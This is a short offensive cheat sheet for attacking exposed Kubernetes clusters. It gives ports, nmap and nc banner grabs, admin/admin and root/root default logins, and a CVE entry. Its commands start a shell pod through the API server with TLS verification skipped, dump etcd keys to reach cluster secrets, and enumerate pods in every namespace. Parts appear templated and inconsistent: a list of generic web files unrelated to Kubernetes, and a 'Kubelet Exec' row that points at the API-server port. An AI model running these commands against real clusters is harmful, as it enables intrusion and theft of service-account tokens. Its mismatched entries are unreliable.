Kubernetes
KubernetesK8sKube
Kubernetes is a container orchestration platform. Exposed API server and kubelet ports allow pod creation, command execution, and cluster compromise.
Ports
| Port | Protocol | Description |
|---|---|---|
| 6443 | tcp | Kubernetes API |
| 10250 | tcp | Kubelet API |
| 10255 | tcp | Kubelet (read-only) |
| 2379 | tcp | etcd |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
nmap -sV -p <port> <target> | Service banner and version info |
nc -nv <target> <port> | Raw banner grab |
Key Files
| Path | Description |
|---|---|
.env | Environment variables with API keys and DB creds |
config.php | Application configuration file |
wp-config.php | WordPress database credentials |
web.config | IIS configuration file |
.git/config | Git repository configuration |
robots.txt | Disallowed paths (information disclosure) |
sitemap.xml | URL structure enumeration |
Default Credentials
| Username | Password | Context |
|---|---|---|
admin | admin | Generic admin account |
root | root | Generic root account |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
CVE-2024-3727 | RCE | Kubelet API auth bypass |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Kubelet Exec | kubectl --server=https://<target>:6443 --insecure-skip-tls-verify run --image=alpine test -- sh | Pod creation |
| etcd Access | etcdctl --endpoints=http://<target>:2379 get / --prefix --keys-only | Read cluster secrets |
Notes
etcd usually stores cluster secrets including service account tokens. If etcd is accessible, the cluster is compromised.
Kubelet API on 10250 allows running commands in any pod without auth.
`kubectl --server=https://<target>:6443 --insecure-skip-tls-verify get pods --all-namespaces`
Seen on
ShodanCensysFOFAZoomEye
References